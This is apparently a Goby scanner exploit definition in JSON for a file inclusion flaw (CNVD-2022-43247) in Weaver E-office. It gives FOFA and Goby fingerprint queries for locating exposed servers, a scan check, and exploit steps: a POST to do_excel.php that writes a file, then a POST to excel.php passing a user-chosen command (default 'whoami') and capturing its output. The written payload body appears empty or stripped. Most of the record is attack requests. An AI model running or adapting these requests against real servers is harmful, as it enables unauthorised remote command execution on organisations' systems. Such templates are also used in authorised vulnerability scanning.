{ "Name": "Weaver E-office do_excel.php file inclusion vulnerability", "Description": "

e-office is a standard collaborative mobile office platform.

There is a file inclusion vulnerability in e-office, through which an attacker can write malicious files.

", "Product": "Weaver E-office", "Homepage": "www.weaver.com.cn", "DisclosureDate": "2022-03-23", "Author": "1243099890@qq.com", "FofaQuery": "((header=\"general/login/index.php\" || body=\"/general/login/view//images/updateLoad.gif\" || (body=\"szFeatures\" && body=\"eoffice\") || header=\"Server: eOffice\") && body!=\"Server: couchdb\") || banner=\"general/login/index.php\"", "GobyQuery": "((header=\"general/login/index.php\" || body=\"/general/login/view//images/updateLoad.gif\" || (body=\"szFeatures\" && body=\"eoffice\") || header=\"Server: eOffice\") && body!=\"Server: couchdb\") || banner=\"general/login/index.php\"", "Level": "3", "Impact": "

There is a file inclusion vulnerability in e-office, through which an attacker can write malicious files.

", "References": [], "Is0day": false, "HasExp": true, "ExpParams": [ { "name": "cmd", "type": "input", "value": "whoami", "show": "" } ], "ExpTips": { "Type": "", "Content": "" }, "ScanSteps": [ "AND", { "Request": { "method": "POST", "uri": "/general/charge/charge_list/do_excel.php", "follow_redirect": true, "header": { "Content-Length": "52", "Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close" }, "data_type": "text", "data": "html=" }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "200", "bz": "" } ] }, "SetVariable": [ "output|lastbody|regex|" ] }, { "Request": { "method": "GET", "uri": "/general/charge/charge_list/excel.php", "follow_redirect": true, "header": { "Content-Length": "52", "Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close" }, "data_type": "text", "data": "" }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "200", "bz": "" }, { "type": "item", "variable": "$body", "operation": "contains", "value": "e165421110ba03099a1c0393373c5b43", "bz": "" } ] }, "SetVariable": [] } ], "ExploitSteps": [ "AND", { "Request": { "method": "POST", "uri": "/general/charge/charge_list/do_excel.php", "follow_redirect": true, "header": { "Content-Length": "52", "Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close" }, "data_type": "text", "data": "html=" }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "200", "bz": "" } ] }, "SetVariable": [] }, { "Request": { "method": "POST", "uri": "/general/charge/charge_list/excel.php", "follow_redirect": true, "header": { "Content-Length": "52", "Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close" }, "data_type": "text", "data": "pass={{{cmd}}}" }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "200", "bz": "" } ] }, "SetVariable": [ "output|lastbody|regex|
(?s)(.*)
" ] } ], "Tags": [ "Remote File Inclusion" ], "VulType": [ "Remote File Inclusion" ], "CVEIDs": [ "" ], "CNNVD": [ "" ], "CNVD": [ "CNVD-2022-43247" ], "CVSSScore": "10.0", "Translation": { "CN": { "Name": "泛微 E-Office 文件包含漏洞(CNVD-2022-43247)", "Product": "泛微 E-office", "Description": "

e-office是上海泛微网络科技股份有限公司一款标准协同移动办公平台。

e-office存在文件包含漏洞,攻击者可以通过该漏洞写入恶意文件。

", "Recommendation": "

厂商已发布补丁修复漏洞,请及时更新:https://www.weaver.com.cn/

", "Impact": "

e-office存在文件包含漏洞,攻击者可以通过该漏洞写入恶意文件。

", "VulType": [ "远程⽂件包含" ], "Tags": [ "远程⽂件包含" ] }, "EN": { "Name": "Weaver E-office do_excel.php file inclusion vulnerability", "Product": "Weaver E-office", "Description": "

e-office is a standard collaborative mobile office platform.

There is a file inclusion vulnerability in e-office, through which an attacker can write malicious files.

", "Recommendation": "

The manufacturer has released a patch to fix the vulnerability, please update it in time:https://www.weaver.com.cn/

", "Impact": "

There is a file inclusion vulnerability in e-office, through which an attacker can write malicious files.

", "VulType": [ "Remote File Inclusion" ], "Tags": [ "Remote File Inclusion" ] } }, "AttackSurfaces": { "Application": null, "Support": null, "Service": null, "System": null, "Hardware": null } }